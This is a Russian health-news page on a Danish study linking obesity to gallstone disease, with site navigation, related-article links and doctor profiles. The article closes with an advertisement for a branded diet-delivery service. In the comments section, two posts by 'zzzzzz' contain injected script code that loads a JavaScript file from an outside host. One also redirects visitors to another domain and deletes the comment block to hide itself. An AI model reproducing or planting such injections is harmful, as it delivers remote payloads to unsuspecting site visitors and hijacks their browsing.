Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Чем больше весишь, тем бо...  >>  Чем больше весишь, тем больше камней в желчном пузыре
 
Обратная связь
 

Чем больше весишь, тем больше камней в желчном пузыре

Размер шрифта
27 января 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые обнаружили, что ожирение повышает риск развития желчнокаменной болезни, особенно у женщин.

Чем больше весишь, тем больше камней в желчном пузыре

Желчнокаменная болезнь возникает в том случае, когда в системе желчевыводящих путей образуются конкременты (то есть камни), состоящие из холестерина, билирубина и некоторых других веществ. Эти конкременты могут нарушать отток желчи, что провоцирует появление ужасных спастических болей, а в ряде случаев может явиться причиной развития жизнеугрожающего состояния – острого холецистита.

Желчнокаменная болезнь является одним из самых распространенных заболеваний пищеварительной системы. Экономический ущерб, связанный с этой патологией, огромен: в США почти шесть миллиардов долларов в год тратится на лечение ЖКБ и ее осложнений.

В прошлом было замечено, что высокий индекс массы тела ассоциирован с повышенным риском развития ЖКБ, но является ли ожирение причиной этой болезни – не вполне ясно.

Чтобы глубже понять взаимосвязь этих двух феноменов, команда ученых из Копенгагенского университета (Дания) во главе с доктором Анной Тибьярг-Хансен провела крупное статистическое исследование. Эксперты работали с массивной выборкой из почти восьмидесяти тысяч человек. В качестве основного статистического метода была выбрана Менделеевская рандомизация (по сути, это математическая модель, использующаяся в эпидемиологии для оценки влияния различных факторов на развитие какого-либо заболевания).
За более чем тридцатилетний (!) период наблюдения клинически выраженная желчнокаменная болезнь развилась у 4 106 человек. Для большинства из них были характерны следующие признаки: старший возраст, женский пол и сниженный уровень физической активности. Любопытно, что испытуемые, у которых развилась ЖКБ, в среднем употребляли меньше алкоголя и чаще принимали гормональные препараты в рамках заместительной терапии.

Однако по-настоящему значимое статистическое наблюдение звучит следующим образом: риск развития ЖКБ увеличивается на 7% с каждой единицей повышения индекса массы тела! «Таким образом, мы доказали, что ожирение оказывает самое непосредственное влияние на развитие желчнокаменной болезни», – утверждает доктор Тибьярг-Хансен.

Поэтому следите за своим весом! Иначе однажды можете оказаться на операционном столе с прободением желчного пузыря!

Для тех, кто хочет похудеть создана «Диета Елены Малышевой»! Уже готовая правильная еда для похудения будет доставлена вам в любое удобное время и место! Вам останется только есть и худеть!

Материалы исследования опубликованы в журнале Hepatology.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:48

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:47

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Старт нового сезона проекта «Сбрось лишнее»   Бойтесь своих друзей, если хотите похудеть   Выключите компьютер! Из-за него вы толстеете!   Диета по группе крови – полный обман! Как реально похудеть?  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда для плоского живота. Часть 2

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.